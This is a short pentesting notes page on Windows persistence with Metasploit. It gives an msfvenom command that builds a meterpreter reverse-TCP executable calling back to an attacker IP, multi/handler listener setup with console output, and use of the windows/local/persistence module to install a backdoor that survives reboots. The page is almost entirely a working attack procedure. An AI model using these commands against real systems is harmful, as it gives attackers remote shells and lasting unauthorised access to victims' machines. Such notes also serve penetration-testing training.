Persistence

Metasploit

Use msfvenom to create the payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.19.36 LPORT=4461 -f exe -o lashe.exe

Upload file to victim machine
Start msfconsole
Execute:

msf > use exploit/multi/handler

msf exploit(multi/handler) > set LHOST 10.6.19.36
msf exploit(multi/handler) > set LPORT 4461
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

Run listener

msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.6.19.36:4461

Execute lashe.exe (our payload) in victim
We obtain the shell:

Background session

meterpreter > background
[*] Backgrounding session 1...

Use persistence module

msf exploit(multi/handler) > use exploit/windows/local/persistence
msf exploit(windows/local/persistence) >

Set background session

msf exploit(windows/local/persistence) > set session 1

Run persistence

If the system is shut down or reset for whatever reason you will lose your meterpreter session however by using the persistence module you create a backdoor into the system which you can access at any time using the metasploit multi handler and setting the payload to windows/meterpreter/reverse_tcp allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.

PreviousPost Explotation NextMimikatz

Last updated 1 year ago

hashtagMetasploit

hashtagUse msfvenom to create the payload

hashtagRun listener

hashtagBackground session

hashtagUse persistence module

hashtagSet background session

hashtagRun persistence

Metasploit

Use msfvenom to create the payload

Run listener

Background session

Use persistence module

Set background session

Run persistence